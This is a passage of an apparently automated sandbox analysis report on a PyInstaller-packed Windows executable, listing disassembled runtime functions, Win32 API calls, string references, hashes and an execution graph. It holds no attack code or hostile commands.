                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncpy
                                                                                                                      • String ID: Cannot allocate memory for necessary files.
                                                                                                                      • API String ID: 2961919466-2795144771
                                                                                                                      • Opcode ID: d7c7a0e83be8ce285f4e944021e370b58d5a93e31adb349cfac03723dcf3749c
                                                                                                                      • Instruction ID: 3936028c1cdd2d8b150a77e956c7a3298e567c6c718c49ac081f34ed32a26dd4
                                                                                                                      • Opcode Fuzzy Hash: d7c7a0e83be8ce285f4e944021e370b58d5a93e31adb349cfac03723dcf3749c
                                                                                                                      • Instruction Fuzzy Hash: 6241D4B2500205ABDB10DE68DC84EA63398BF44316F080975FF0CCB582D775E598A7B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                      • API String ID: 0-2340494698
                                                                                                                      • Opcode ID: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
                                                                                                                      • Instruction ID: 769c05011eb38cc9b8a535f25af5ba234d1ecafb8155463702d38078dff943d7
                                                                                                                      • Opcode Fuzzy Hash: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
                                                                                                                      • Instruction Fuzzy Hash: 46319171E00218EFCB21DF99CC819EEBBB8FF99310B144166E804E7211D7B59E44EBA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID: TMP
                                                                                                                      • API String ID: 269201875-3125297090
                                                                                                                      • Opcode ID: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
                                                                                                                      • Instruction ID: fa3d2acf416d4f7a16f8131d253360dda85099e39a6b30d901fd219c02cec381
                                                                                                                      • Opcode Fuzzy Hash: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
                                                                                                                      • Instruction Fuzzy Hash: FD21937790420A6E5725AA1A9C83D7F73EDEAC277432D802AFC0A9B741EF74DD017261
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      Strings
                                                                                                                      • Failed to convert executable path to UTF-8., xrefs: 00F53517
                                                                                                                      • Failed to get executable path., xrefs: 00F534D6
                                                                                                                      • GetModuleFileNameW, xrefs: 00F534DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                      • API String ID: 2776309574-1977442011
                                                                                                                      • Opcode ID: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
                                                                                                                      • Instruction ID: 4b6baa833ee212b6c71ae0a493299a779dbd1518df30678c6390aaa1cfa8743d
                                                                                                                      • Opcode Fuzzy Hash: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
                                                                                                                      • Instruction Fuzzy Hash: 6901DD757143006BF618A7249C8B7EB33C9AF54701F804455BF4DC2182F5AC9A0CE697
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3213747228-0
                                                                                                                      • Opcode ID: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
                                                                                                                      • Instruction ID: 623d3f7e87e38a1deec7359d066e732d88ff50c55bf4223ad5eb84214dfbaf4b
                                                                                                                      • Opcode Fuzzy Hash: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
                                                                                                                      • Instruction Fuzzy Hash: 90B13772D002859FDB11CF38C851BEEBBF5EF55354F2481AAE845EB242D6399D01EBA0
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F7014E
                                                                                                                      • _free.LIBCMT ref: 00F70177
                                                                                                                      • SetEndOfFile.KERNEL32(00000000,00F6E4B2,00000000,00F68438,?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000), ref: 00F701A9
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000,?,?,?,?,00000000), ref: 00F701C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1547350101-0
                                                                                                                      • Opcode ID: 38b34470736f929ddddc942577d3d0716d7d75d946fcd3805a5bfe3ddab8f019
                                                                                                                      • Instruction ID: 13ddb5071b192cfb74f8b1ca9e122d77cae321ad4dff42bc04ff47a7b393d20d
                                                                                                                      • Opcode Fuzzy Hash: 38b34470736f929ddddc942577d3d0716d7d75d946fcd3805a5bfe3ddab8f019
                                                                                                                      • Instruction Fuzzy Hash: 8E412832900204EBDB15ABB8DC42B9E37B5EF443B0F644552F91CE72A1DEB8D954B722
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F5C84E,?,?,?,?,00F5C00A,?,?,?), ref: 00F66259
                                                                                                                      • _free.LIBCMT ref: 00F662B6
                                                                                                                      • _free.LIBCMT ref: 00F662EC
                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00F5C00A,?,?,?), ref: 00F662F7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2283115069-0
                                                                                                                      • Opcode ID: 0a328ae28c16c738952a67607553d029ee42de488aa70b80dd4b02acec98e26e
                                                                                                                      • Instruction ID: 136cb0932026ed6828fda241b995760918b02c09c823bb6373c1d24061a6b29d
                                                                                                                      • Opcode Fuzzy Hash: 0a328ae28c16c738952a67607553d029ee42de488aa70b80dd4b02acec98e26e
                                                                                                                      • Instruction Fuzzy Hash: F11182326046443ADF5137B89CD7E7B3A59DBC1778B340224F924C72E2DEB58D097220
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F663B0
                                                                                                                      • _free.LIBCMT ref: 00F6640D
                                                                                                                      • _free.LIBCMT ref: 00F66443
                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F6644E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2283115069-0
                                                                                                                      • Opcode ID: c6a07b6bf22a65b253cad5691fbdbe7150554be9579b9deafa7ae28fb5c45217
                                                                                                                      • Instruction ID: ad61a686e0009904b778177c8fe733baf8bba1387840896059b781d75bd600b9
                                                                                                                      • Opcode Fuzzy Hash: c6a07b6bf22a65b253cad5691fbdbe7150554be9579b9deafa7ae28fb5c45217
                                                                                                                      • Instruction Fuzzy Hash: F711A5326046147AD7117AB5AC87E7B3659DBC1774B240334F528D33E1DEB58C457311
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001), ref: 00F5F1E2
                                                                                                                      • GetLastError.KERNEL32(?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104), ref: 00F5F1EC
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5F1F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2398240785-0
                                                                                                                      • Opcode ID: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
                                                                                                                      • Instruction ID: ac1cbd61f767423f856330e0a65cf455ee27284160f5922c561c3f7546230a5b
                                                                                                                      • Opcode Fuzzy Hash: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
                                                                                                                      • Instruction Fuzzy Hash: E9F06D36A00115BBCB202FA2DC08D5AFF69EF457B270445A1FA19C6420D731E969FBD0
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00F5F179
                                                                                                                      • GetLastError.KERNEL32(?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104,?), ref: 00F5F183
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5F18A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2398240785-0
                                                                                                                      • Opcode ID: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
                                                                                                                      • Instruction ID: 86f8cb9fd64ca095aeac8cc7ba234300bac01f384a57444d162aadc13a297d2a
                                                                                                                      • Opcode Fuzzy Hash: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
                                                                                                                      • Instruction Fuzzy Hash: 88F06932A00915FBCB202BA2DC08D5ABF6AEF443A27154562FA1DC6420D731E968FBD0
                                                                                                                      APIs
                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000), ref: 00F6F67E
                                                                                                                      • GetLastError.KERNEL32(?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000,?,00F65711,?), ref: 00F6F68A
                                                                                                                        • Part of subcall function 00F6F650: CloseHandle.KERNEL32(FFFFFFFE,00F6F69A,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000), ref: 00F6F660
                                                                                                                      • ___initconout.LIBCMT ref: 00F6F69A
                                                                                                                        • Part of subcall function 00F6F612: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F6F641,00F6B4FB,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F625
                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F6AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2744216297-0
                                                                                                                      • Opcode ID: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
                                                                                                                      • Instruction ID: 44d623b026365f8bbcac9ade9d576851d5f63ffecef2259d229fc677b74173b4
                                                                                                                      • Opcode Fuzzy Hash: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
                                                                                                                      • Instruction Fuzzy Hash: EAF03937400128BBCF222F95ED099DA7F66FF197A0B404020FA0C96170CB338964BB91
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F62DD5
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F62DE8
                                                                                                                      • _free.LIBCMT ref: 00F62DF9
                                                                                                                      • _free.LIBCMT ref: 00F62E0A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
                                                                                                                      • Instruction ID: cbf15a8db23bfed0f43eb8ecd8a3a98e53ff0e54d82640f23c8a9c4b1b90513c
                                                                                                                      • Opcode Fuzzy Hash: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
                                                                                                                      • Instruction Fuzzy Hash: 57E0BF714001689E8711AF25FC028F63B75E7887207514027F414A2232C7B5165DFFD1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Failed to convert Wflag %s using mbstowcs (invalid multibyte string), xrefs: 00F544DA
                                                                                                                      • pyi-, xrefs: 00F5438B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _mbstowcs
                                                                                                                      • String ID: Failed to convert Wflag %s using mbstowcs (invalid multibyte string)$pyi-
                                                                                                                      • API String ID: 686213805-3625900369
                                                                                                                      • Opcode ID: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
                                                                                                                      • Instruction ID: fa3554216c446def08ab37fcb0b8a6d9cd0deafa84d4ecbccc4e2728118b1d6d
                                                                                                                      • Opcode Fuzzy Hash: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
                                                                                                                      • Instruction Fuzzy Hash: 6341E8B69403006BD754EF64EC47F6637A8AB0031AF440950FF0497293EABDB55CB7A2

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:5.7%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:36
                                                                                                                      execution_graph 20115 f5e77b 20116 f5e797 20115->20116 20117 f5e789 20115->20117 20151 f5eb8a 20116->20151 20128 f5e7ed 20117->20128 20121 f5e793 20124 f5e7c5 20126 f5e7e7 20124->20126 20127 f63b77 _free 14 API calls 20124->20127 20125 f5e7ed 56 API calls 20125->20124 20127->20126 20129 f5e818 __fread_nolock 20128->20129 20130 f5e7fb 20128->20130 20133 f5e83e 20129->20133 20134 f5e85a CreateFileW 20129->20134 20131 f5e606 __dosmaperr 14 API calls 20130->20131 20132 f5e800 20131->20132 20135 f5e619 __dosmaperr 14 API calls 20132->20135 20136 f5e606 __dosmaperr 14 API calls 20133->20136 20137 f5e88c 20134->20137 20138 f5e87e 20134->20138 20139 f5e808 20135->20139 20140 f5e843 20136->20140 20185 f5e8cb 20137->20185 20159 f5e955 GetFileType 20138->20159 20142 f63b33 _mbstowcs 25 API calls 20139->20142 20144 f5e619 __dosmaperr 14 API calls 20140->20144 20145 f5e813 20142->20145 20146 f5e84a 20144->20146 20145->20121 20147 f63b33 _mbstowcs 25 API calls 20146->20147 20149 f5e855 20147->20149 20148 f5e887 __fread_nolock 20148->20149 20150 f5e8bd CloseHandle 20148->20150 20149->20121 20150->20149 20152 f5c80e _mbstowcs 37 API calls 20151->20152 20153 f5eb9c 20152->20153 20154 f5e7b1 20153->20154 20287 f67273 20153->20287 20156 f5e75e 20154->20156 20293 f5e6ac 20156->20293 20160 f5e990 20159->20160 20161 f5ea42 20159->20161 20164 f5e9aa __fread_nolock 20160->20164 20196 f5ed82 20160->20196 20162 f5ea6e 20161->20162 20163 f5ea4c 20161->20163 20165 f5ea98 PeekNamedPipe 20162->20165 20170 f5ea39 20162->20170 20167 f5ea50 20163->20167 20168 f5ea5f GetLastError 20163->20168 20169 f5e9c9 GetFileInformationByHandle 20164->20169 20164->20170 20165->20170 20171 f5e619 __dosmaperr 14 API calls 20167->20171 20173 f5e5e3 __dosmaperr 14 API calls 20168->20173 20169->20168 20172 f5e9df 20169->20172 20174 f596fa _ValidateLocalCookies 5 API calls 20170->20174 20171->20170 20203 f5ecd4 20172->20203 20173->20170 20176 f5eac3 20174->20176 20176->20148 20180 f5eac5 7 API calls 20181 f5ea0f 20180->20181 20182 f5eac5 7 API calls 20181->20182 20183 f5ea26 20182->20183 20220 f5eca1 20183->20220 20264 f5ef1f 20185->20264 20188 f5e8de 20190 f5e5e3 __dosmaperr 14 API calls 20188->20190 20189 f5e8ea 20191 f5ecd4 38 API calls 20189->20191 20192 f5e8e5 20190->20192 20193 f5e8f7 20191->20193 20192->20148 20194 f5ed82 21 API calls 20193->20194 20195 f5e916 20194->20195 20195->20148 20197 f5ed9b 20196->20197 20198 f5edd1 20197->20198 20199 f5edaf 20197->20199 20225 f676c8 20198->20225 20201 f5e5e3 __dosmaperr 14 API calls 20199->20201 20202 f5edbc 20199->20202 20201->20202 20202->20164 20205 f5ecea 20203->20205 20204 f5e9eb 20213 f5eac5 20204->20213 20205->20204 20239 f67836 20205->20239 20207 f5ed2e 20207->20204 20208 f67836 38 API calls 20207->20208 20209 f5ed3f 20208->20209 20209->20204 20210 f67836 38 API calls 20209->20210 20211 f5ed50 20210->20211 20211->20204 20212 f67836 38 API calls 20211->20212 20212->20204 20214 f5eadd 20213->20214 20215 f5eaeb FileTimeToSystemTime 20213->20215 20214->20215 20217 f5eae3 20214->20217 20216 f5eafd SystemTimeToTzSpecificLocalTime 20215->20216 20215->20217 20216->20217 20218 f596fa _ValidateLocalCookies 5 API calls 20217->20218 20219 f5e9fc 20218->20219 20219->20180 20221 f5ecb5 20220->20221 20222 f5ecbf 20221->20222 20223 f5e619 __dosmaperr 14 API calls 20221->20223 20222->20170 20224 f5ecca 20223->20224 20224->20170 20226 f5a8f0 __fread_nolock 20225->20226 20227 f676f2 GetCurrentDirectoryW 20226->20227 20228 f6770e 20227->20228 20229 f6771d 20227->20229 20235 f596fa _ValidateLocalCookies 5 API calls 20228->20235 20230 f67024 __dosmaperr 14 API calls 20229->20230 20231 f6772a 20230->20231 20232 f67732 GetCurrentDirectoryW 20231->20232 20233 f6773e 20231->20233 20232->20233 20236 f67743 20232->20236 20234 f5e619 __dosmaperr 14 API calls 20233->20234 20234->20236 20237 f6776a 20235->20237 20238 f63b77 _free 14 API calls 20236->20238 20237->20202 20238->20228 20240 f67844 20239->20240 20241 f67867 20239->20241 20240->20241 20242 f6784a 20240->20242 20249 f6787f 20241->20249 20245 f5e619 __dosmaperr 14 API calls 20242->20245 20244 f6787a 20244->20207 20246 f6784f 20245->20246 20247 f63b33 _mbstowcs 25 API calls 20246->20247 20248 f6785a 20247->20248 20248->20207 20250 f6788f 20249->20250 20251 